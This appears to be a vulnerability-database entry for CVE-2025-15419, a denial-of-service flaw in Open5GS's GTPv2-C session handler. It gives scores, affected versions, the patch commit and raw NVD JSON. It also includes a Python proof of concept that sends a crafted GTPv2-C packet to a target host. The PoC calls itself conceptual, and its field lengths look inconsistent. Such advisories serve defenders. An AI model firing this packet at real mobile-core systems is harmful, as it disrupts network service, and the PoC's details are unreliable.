Security Vulnerability Report
CVE-2025-15419 CVSS 3.3 LOW

Published: 2026-01-02 01:15:50
Last Modified: 2026-04-29 01:00:02

Description

A weakness has been identified in Open5GS up to 2.7.6. It affects the function sgwc_s5c_handle_create_session_response in the file src/sgwc/s5c-handler.c of the component GTPv2-C Flow Handler. Manipulation can lead to denial of service. The attack must be launched locally. The exploit has been made available to the public and could be used for attacks. The patch is identified as 5aaa09907e7b9e0a326265a5f08d56f54280b5f2. Applying the patch is advised to correct this issue.

CVSS Details

CVSS Score: 3.3
Severity: LOW
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:open5gs:open5gs:*:*:*:*:*:*:*:* - VULNERABLE
Open5GS < 2.7.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-15419 PoC - Open5GS GTPv2-C DoS
Note: This is a conceptual PoC for educational purposes only.
Actual exploitation requires GTPv2-C protocol knowledge and Open5GS internals.
"""
import socket
import struct


def build_gtpv2c_create_session_response(teid: int, sequence: int) -> bytes:
    """
    Build a malicious GTPv2-C Create Session Response message
    that triggers the vulnerability in sgwc_s5c_handle_create_session_response
    """
    # GTPv2-C Header
    version = 0x2 << 5  # Version 2
    flags = 0x30  # TEID present, no piggybacking
    message_type = 0x36  # Create Session Response

    # Message header
    header = bytearray([
        version | flags,
        message_type,
        0x00, 0x00,  # Length (to be filled)
        (teid >> 24) & 0xFF,
        (teid >> 16) & 0xFF,
        (teid >> 8) & 0xFF,
        teid & 0xFF,
        (sequence >> 16) & 0xFF,
        (sequence >> 8) & 0xFF,
        sequence & 0xFF,
        0xFF  # spare
    ])

    # IE: Cause (mandatory)
    cause_ie = bytearray([
        0x02, 0x00,  # IE Type: Cause
        0x00, 0x06,  # Length
        0x00,  # Spare + T (triggering message)
        0x10,  # Cause: Request accepted
        0x00, 0x00  # Spare
    ])

    # IE: F-TEID (with crafted data to trigger vulnerability)
    fteid_ie = bytearray([
        0x00, 0x01,  # IE Type: F-TEID
        0x00, 0x0A,  # Length
        0x80,  # Flags
        0x00, 0x00, 0x00, 0x01,  # TEID
        0x00,  # IPv4 address (incomplete)
        0x00, 0x00  # Interface type
    ])

    payload = cause_ie + fteid_ie

    # Update length in header (header without first 4 bytes)
    length = len(payload)
    header[2] = (length >> 8) & 0xFF
    header[3] = length & 0xFF

    return bytes(header) + bytes(payload)


def send_malicious_packet(target_ip: str, target_port: int, teid: int):
    """
    Send malicious GTPv2-C packet to trigger DoS
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(5)

    sequence = 0x123456
    packet = build_gtpv2c_create_session_response(teid, sequence)

    try:
        sock.sendto(packet, (target_ip, target_port))
        print(f"[+] Malicious packet sent to {target_ip}:{target_port}")
        print(f"[+] TEID: {hex(teid)}, Sequence: {hex(sequence)}")
    except Exception as e:
        print(f"[-] Error sending packet: {e}")
    finally:
        sock.close()


if __name__ == "__main__":
    import sys

    if len(sys.argv) < 3:
        print(f"Usage: {sys.argv[0]} <target_ip> <teid>")
        sys.exit(1)

    target_ip = sys.argv[1]
    teid = int(sys.argv[2], 0)
    target_port = 2123  # Default GTPv2-C control plane port

    send_malicious_packet(target_ip, target_port, teid)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-15419", "sourceIdentifier": "[email protected]", "published": "2026-01-02T01:15:50.053", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in Open5GS up to 2.7.6. Affected by this issue is the function sgwc_s5c_handle_create_session_response of the file src/sgwc/s5c-handler.c of the component GTPv2-C Flow Handler. Executing a manipulation can lead to denial of service. The attack needs to be launched locally. The exploit has been made available to the public and could be used for attacks. This patch is called 5aaa09907e7b9e0a326265a5f08d56f54280b5f2. It is advisable to implement a patch to correct this issue."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.9, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", 
"modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 3.3, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:S/C:N/I:N/A:P", "baseScore": 1.7, "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "PARTIAL"}, "baseSeverity": "LOW", "exploitabilityScore": 3.1, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-404"}]}], "configurations": [{"nodes": 
[{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:open5gs:open5gs:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.7.6", "matchCriteriaId": "9C77332A-BAA3-4FE7-A237-B87F175C6F48"}]}]}], "references": [{"url": "https://github.com/open5gs/open5gs/", "source": "[email protected]"}, {"url": "https://github.com/open5gs/open5gs/commit/5aaa09907e7b9e0a326265a5f08d56f54280b5f2", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/open5gs/open5gs/issues/4224", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Vendor Advisory"]}, {"url": "https://github.com/open5gs/open5gs/issues/4224#issue-3766767406", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Vendor Advisory"]}, {"url": "https://github.com/open5gs/open5gs/issues/4224#issuecomment-3698521008", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Vendor Advisory"]}, {"url": "https://vuldb.com/?ctiid.339341", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.c ... (truncated)